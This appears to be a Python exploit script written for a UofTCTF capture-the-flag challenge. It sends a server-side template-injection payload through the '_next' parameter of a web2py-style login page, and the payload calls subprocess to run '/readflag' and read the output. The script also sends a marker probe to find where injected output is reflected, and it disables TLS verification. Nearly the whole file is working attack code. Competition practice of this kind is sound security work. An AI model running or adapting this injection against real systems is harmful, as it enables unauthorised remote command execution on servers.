#!/usr/bin/env python3
import requests
import urllib3
urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

# Test with readflag payload
payload = "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"

response = requests.get(
    BASE_URL + "/welcome/default/user/login",
    params={"_next": payload},
    verify=False
)

print(f"Status: {response.status_code}")
print(f"Length: {len(response.text)}")

# Simple search for flag
lines = response.text.split('\n')
for i, line in enumerate(lines):
    if 'uoft' in line.lower():
        print(f"\n[!!!] Line {i} contains 'uoft':")
        print(line)
        print(lines[i-1] if i > 0 else "")
        print(lines[i+1] if i < len(lines)-1 else "")

# Save response
with open("readflag_next.html", "w", encoding="utf-8") as f:
    f.write(response.text)

print("\nSaved to readflag_next.html")

# Also check for the marker to see where it appears
marker_response = requests.get(
    BASE_URL + "/welcome/default/user/login",
    params={"_next": "{{='FINDME_12345'}}"},
    verify=False
)

if "FINDME_12345" in marker_response.text:
    idx = marker_response.text.find("FINDME_12345")
    print(f"\n[+] Marker found at position {idx}")
    print("Context:")
    print(marker_response.text[max(0,idx-300):idx+300])